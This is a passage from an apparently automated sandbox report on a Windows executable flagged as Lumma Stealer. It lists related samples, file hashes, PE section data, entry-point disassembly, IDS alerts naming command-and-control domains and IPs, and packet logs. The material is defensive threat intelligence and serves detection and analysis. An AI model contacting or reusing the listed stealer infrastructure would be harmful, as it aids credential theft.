                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 172.67.206.204
                                                                      SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exeGet hashmaliciousUnknownBrowse
                                                                      • 172.67.35.220
                                                                      SecuriteInfo.com.Trojan.Siggen29.50366.26295.18671.exeGet hashmaliciousXmrigBrowse
                                                                      • 104.20.4.235
                                                                      AKAMAI-ASUSfile.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exeGet hashmaliciousUnknownBrowse
                                                                      • 23.212.89.10
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exeGet hashmaliciousUnknownBrowse
                                                                      • 2.19.126.150
                                                                      SecuriteInfo.com.Win32.Evo-gen.15503.22039.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      • 172.67.206.204
                                                                      20Listen.emlGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.102.49.254
                                                                      • 172.67.206.204
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      • 172.67.206.204
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      • 172.67.206.204
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      • 172.67.206.204
                                                                      SecuriteInfo.com.Win32.Evo-gen.15503.22039.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      • 172.67.206.204
                                                                      SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      • 172.67.206.204
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      • 172.67.206.204
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      • 172.67.206.204
                                                                      SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      • 172.67.206.204

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_2f26e4b65edfc9809a16d7533fcfcfa7c28d99cc_852b229c_92fb6e2e-1bd9-4b91-8814-cd6295476d3d\Report.wer

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):65536
                                                                      Entropy (8bit):1.0430736213201095
                                                                      Encrypted:false
                                                                      SSDEEP:192:Pojj5B0Yo55vfPlktS0BU/fI3juFCoV2hzuiF/Z24IO8TVB:xfN6ZBU/YjMOzuiF/Y4IO8X
                                                                      MD5:68C47070DFB273E5C48DC38B4CE537EE
                                                                      SHA1:44F3472B921C9CB31C40BC1B8E62A122D02078A4
                                                                      SHA-256:FBABE6B58200536CC40992CDEFE81C8974A0DAA22318C039C9D45FD0A6566FC6
                                                                      SHA-512:FDDE9FEF8B3AB226CB2F25C84E7AE497369D69D41B5AC4561EA10F53D7AF2D819C298E26293301B63B92FF43DE6F01562D7CE015FBC14B4B3B78E41ADA0115BA
                                                                      Malicious:true
                                                                      Reputation:low
                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.3.4.4.6.3.3.2.3.1.0.9.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.3.4.4.6.3.4.1.3.7.3.3.9.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.2.f.b.6.e.2.e.-.1.b.d.9.-.4.b.9.1.-.8.8.1.4.-.c.d.6.2.9.5.4.7.6.d.3.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.b.6.5.c.7.6.-.6.4.e.2.-.4.6.b.3.-.8.9.f.a.-.1.c.8.9.b.1.1.b.4.7.e.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.c.0.-.0.0.0.1.-.0.0.1.4.-.c.6.8.d.-.b.0.5.e.d.c.1.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.4.d.3.9.7.e.1.6.c.2.3.6.a.f.9.6.6.2.5.3.e.0.7.6.3.6.0.4.8.7.b.0.d.b.0.3.d.2.f.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0.

                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF61A.tmp.dmp

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 15 streams, Mon Oct 14 01:57:13 2024, 0x1205a4 type
                                                                      Category:dropped
                                                                      Size (bytes):294164
                                                                      Entropy (8bit):1.480256139213818
                                                                      Encrypted:false
                                                                      SSDEEP:768:00AAABrN1qafajtJScK5vGimsNkXcbLGIM:PApN1qAaB+nccbi3
                                                                      MD5:BAC0626576271E1D4D369C44F893F443
                                                                      SHA1:7EA5F6337125A3741577630E36E334A73122D793
                                                                      SHA-256:0029C355346E5B41D57AC722074B1422A7417AAD9B14AF226061A54F38A6F95C
                                                                      SHA-512:62AFE234FC3AF3E26D042545F0532F89A29C864A02E5A131F6BE509D576E521B707FECE82F3A634D902772E708931BB0D26FA37B9DCD6BEE8114E7EB206C371E
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:MDMP..a..... .......yz.g........................T...........l...,'.....................`.......8...........T........... J...2...........'...........)..............................................................................eJ.......*......GenuineIntel............T...........qz.g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF89C.tmp.WERInternalMetadata.xml

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):8290
                                                                      Entropy (8bit):3.6926737642541476
                                                                      Encrypted:false
                                                                      SSDEEP:192:R6l7wVeJOC36Y6Y9VmSUurKgmfBGetprSW89bT/sfAzRm:R6lXJt6Y6YHmSUurKgmfZi/Tkfl
                                                                      MD5:61A3330EB27660E3E8991F3763A62F6D
                                                                      SHA1:D3446E830CD5491C2B59E27C77D23E9F7E0FF4AB
                                                                      SHA-256:6F21557C7886B6C4960A5E4E10FBE03FECF1E565A09884932C69BB33AC704BF0
                                                                      SHA-512:14EF199AAA85D3AAA6A68589F9C92F2F4728E2EA36D9D52C8CEBE5509392A6A43D90E81B5CD303B170B6690B92730C0AF012F7B27C2E45D60B8E470EC123718F
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.4.8.<./.P.i.

                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF8DB.tmp.xml

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4542
                                                                      Entropy (8bit):4.4305358777858475
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwWl8zsjJg77aI9vJbKWpW8VYsYm8M4JjlFCZ+q8CIGhUufd:uIjf9I7nf7VYJaYGeufd
                                                                      MD5:AA341CFC091085769D40C99740C0F040
                                                                      SHA1:E2D2FD649F236A9ED35461CD4421605894DF6CC4
                                                                      SHA-256:C6E4DD263C05EAA49C6FDE455029E1165BCFC3E2528DD78B647BE0A13748C0DD
                                                                      SHA-512:C747300922A52BCB50CDD6459D8101FA821962E7B7CCBD7061A2C44149739A77B14EEC3DACE4C450EA8E184EE503611258EBEDCF0F5DFAC650A3EEDF70C4EC12
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="542459" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                      Category:dropped
                                                                      Size (bytes):1835008
                                                                      Entropy (8bit):4.465290231556066
                                                                      Encrypted:false
                                                                      SSDEEP:6144:TIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSbp:EXD94+WlLZMM6YFH1+p
                                                                      MD5:DB50CE881EAADCD0112D995747AE45EE
                                                                      SHA1:7E4DBC14232FC99CCC9689974FAB64E0CBFD91B3
                                                                      SHA-256:429D08C6CFAF1178D15897E8C138485D599DF3C8FFD6E4C4805969FB8FF665AF
                                                                      SHA-512:424437155B1B34A5F92453B112F8C0246C5D8F19D13C2E0C23A8EA309D17ABC4BA7C2D42CB48C4E444E19D346AFD85DC575A092DB6DB2E34E3DE40C9E1D7A691
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.].b...................................................................................................................................................................................................................................................................................................................................................V........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.534367610683792
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:file.exe
                                                                      File size:2'952'192 bytes
                                                                      MD5:283f654b01a0041e91613545e4b1b7d1
                                                                      SHA1:4d397e16c236af966253e076360487b0db03d2fb
                                                                      SHA256:5f4bbf88da5f3b824e903fa9b2b0458f684ff94157abca983e32c18f7da9f70b
                                                                      SHA512:3f5d5aa516d31ee3738eee0e33241a8ca1fb9e830146b1e133b7874dcd0d89efd1f5dc7d8db27cd1e48d1e7c2d588112059e910899e6f99e05c67eeaba532a7d
                                                                      SSDEEP:49152:kYXIDZ+gOigbzjCaVym1Gxx1H2bKmyDc:kYXIDZ+gOigbzjCagucx10KPDc
                                                                      TLSH:40D53AA1A40D72CFF4CE1778D52BCE46596E07FA472008C3986D75BA7DA3CC125BAC68
                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f..............................0...........@...........................0.......-...@.................................W...k..

                                                                      File Icon

                                                                      Icon Hash:90cececece8e8eb0

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x709000
                                                                      Entrypoint Section:.taggant
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:6
                                                                      OS Version Minor:0
                                                                      File Version Major:6
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:6
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp 00007F7648C9527Ah
                                                                      pminsw mm5, qword ptr [eax+eax]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      jmp 00007F7648C97275h
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [esi], al
                                                                      or al, byte ptr [eax]
                                                                      add byte ptr [ebx], cl
                                                                      or al, byte ptr [eax]
                                                                      add byte ptr [ecx], al
                                                                      or al, byte ptr [eax]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [edi], al
                                                                      or al, byte ptr [eax]
                                                                      add byte ptr [ebx], cl
                                                                      or al, byte ptr [eax]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [ecx], al
                                                                      add byte ptr [eax], 00000000h
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      adc byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      pop es
                                                                      or al, byte ptr [eax]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], dh
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x5f0570x6b.idata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f1f80x8.idata
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      0x10000x5d0000x25e009bb59d96493e09b26642cb8565f43ae0False0.9995874587458746OpenPGP Public Key7.984995408266034IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc 0x5e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .idata 0x5f0000x10000x200fe72def8b74193a84232a780098a7ce0False0.150390625data1.04205214219471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      knvbsjee0x600000x2a80000x2a760010142cc2df7efbdca607d09e4748085funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      blpyabbn0x3080000x10000x400b34d1798a637da73ea1f980733208138False0.7919921875data6.17482717238902IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .taggant0x3090000x30000x2200dc5a80094294bc98113c66f5989d6289False0.09558823529411764DOS executable (COM)1.0925521783158207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                      Imports

                                                                      DLLImport
                                                                      kernel32.dlllstrcpy

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-10-14T03:57:09.547857+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.4607361.1.1.153UDP
                                                                      2024-10-14T03:57:09.558059+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.4577321.1.1.153UDP
                                                                      2024-10-14T03:57:09.567874+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.4576411.1.1.153UDP
                                                                      2024-10-14T03:57:09.579914+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.4547801.1.1.153UDP
                                                                      2024-10-14T03:57:09.589679+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.4604351.1.1.153UDP
                                                                      2024-10-14T03:57:09.602986+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.4652561.1.1.153UDP
                                                                      2024-10-14T03:57:09.626697+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.4638261.1.1.153UDP
                                                                      2024-10-14T03:57:09.639455+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.4546601.1.1.153UDP
                                                                      2024-10-14T03:57:10.919588+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.449730104.102.49.254443TCP
                                                                      2024-10-14T03:57:11.721625+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731172.67.206.204443TCP
                                                                      2024-10-14T03:57:11.721625+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731172.67.206.204443TCP
                                                                      2024-10-14T03:57:12.971702+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449732172.67.206.204443TCP
                                                                      2024-10-14T03:57:12.971702+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732172.67.206.204443TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 14, 2024 03:57:09.664815903 CEST49730443192.168.2.4104.102.49.254
                                                                      Oct 14, 2024 03:57:09.664911985 CEST44349730104.102.49.254192.168.2.4
                                                                      Oct 14, 2024 03:57:09.664997101 CEST49730443192.168.2.4104.102.49.254
                                                                      Oct 14, 2024 03:57:09.668440104 CEST49730443192.168.2.4104.102.49.254
                                                                      Oct 14, 2024 03:57:09.668474913 CEST44349730104.102.49.254192.168.2.4
                                                                      Oct 14, 2024 03:57:10.391253948 CEST44349730104.102.49.254192.168.2.4
                                                                      Oct 14, 2024 03:57:10.391334057 CEST49730443192.168.2.4104.102.49.254
                                                                      Oct 14, 2024 03:57:10.394933939 CEST49730443192.168.2.4104.102.49.254
                                                                      Oct 14, 2024 03:57:10.394959927 CEST44349730104.102.49.254192.168.2.4
                                                                      Oct 14, 2024 03:57:10.395361900 CEST44349730104.102.49.254192.168.2.4
                                                                      Oct 14, 2024 03:57:10.441219091 CEST49730443192.168.2.4104.102.49.254
                                                                      Oct 14, 2024 03:57:10.485296965 CEST49730443192.168.2.4104.102.49.254
                                                                      Oct 14, 2024 03:57:10.531451941 CEST44349730104.102.49.254192.168.2.4
                                                                      Oct 14, 2024 03:57:10.919673920 CEST44349730104.102.49.254192.168.2.4
                                                                      Oct 14, 2024 03:57:10.919728994 CEST44349730104.102.49.254192.168.2.4
                                                                      Oct 14, 2024 03:57:10.919770956 CEST49730443192.168.2.4104.102.49.254
                                                                      Oct 14, 2024 03:57:10.919780970 CEST44349730104.102.49.254192.168.2.4
                                                                      Oct 14, 2024 03:57:10.919796944 CEST44349730104.102.49.254192.168.2.4
                                                                      Oct 14, 2024 03:57:10.919836998 CEST44349730104.102.49.254192.168.2.4
                                                                      Oct 14, 2024 03:57:10.919864893 CEST44349730104.102.49.254192.168.2.4
                                                                      Oct 14, 2024 03:57:10.919900894 CEST49730443192.168.2.4104.102.49.254
                                                                      Oct 14, 2024 03:57:10.919900894 CEST49730443192.168.2.4104.102.49.254
                                                                      Oct 14, 2024 03:57:10.919900894 CEST49730443192.168.2.4104.102.49.254
                                                                      Oct 14, 2024 03:57:10.919964075 CEST49730443192.168.2.4104.102.49.254
                                                                      Oct 14, 2024 03:57:11.051736116 CEST44349730104.102.49.254192.168.2.4
                                                                      Oct 14, 2024 03:57:11.051800013 CEST44349730104.102.49.254192.168.2.4
                                                                      Oct 14, 2024 03:57:11.051831961 CEST49730443192.168.2.4104.102.49.254
                                                                      Oct 14, 2024 03:57:11.051867962 CEST44349730104.102.49.254192.168.2.4
                                                                      Oct 14, 2024 03:57:11.051896095 CEST49730443192.168.2.4104.102.49.254
                                                                      Oct 14, 2024 03:57:11.051947117 CEST49730443192.168.2.4104.102.49.254
                                                                      Oct 14, 2024 03:57:11.057419062 CEST44349730104.102.49.254192.168.2.4
                                                                      Oct 14, 2024 03:57:11.057517052 CEST49730443192.168.2.4104.102.49.254
                                                                      Oct 14, 2024 03:57:11.057532072 CEST44349730104.102.49.254192.168.2.4
                                                                      Oct 14, 2024 03:57:11.057588100 CEST49730443192.168.2.4104.102.49.254
                                                                      Oct 14, 2024 03:57:11.057631969 CEST44349730104.102.49.254192.168.2.4
                                                                      Oct 14, 2024 03:57:11.057686090 CEST49730443192.168.2.4104.102.49.254
                                                                      Oct 14, 2024 03:57:11.065529108 CEST49730443192.168.2.4104.102.49.254
                                                                      Oct 14, 2024 03:57:11.065561056 CEST44349730104.102.49.254192.168.2.4
                                                                      Oct 14, 2024 03:57:11.093750000 CEST49731443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:11.093842030 CEST44349731172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:11.093940020 CEST49731443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:11.094324112 CEST49731443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:11.094399929 CEST44349731172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:11.578244925 CEST44349731172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:11.578331947 CEST49731443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:11.582703114 CEST49731443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:11.582731962 CEST44349731172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:11.582995892 CEST44349731172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:11.584619999 CEST49731443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:11.584664106 CEST49731443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:11.584744930 CEST44349731172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:11.721756935 CEST44349731172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:11.721926928 CEST44349731172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:11.722074032 CEST44349731172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:11.722104073 CEST49731443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:11.722171068 CEST44349731172.67.206.204192.168.2.4
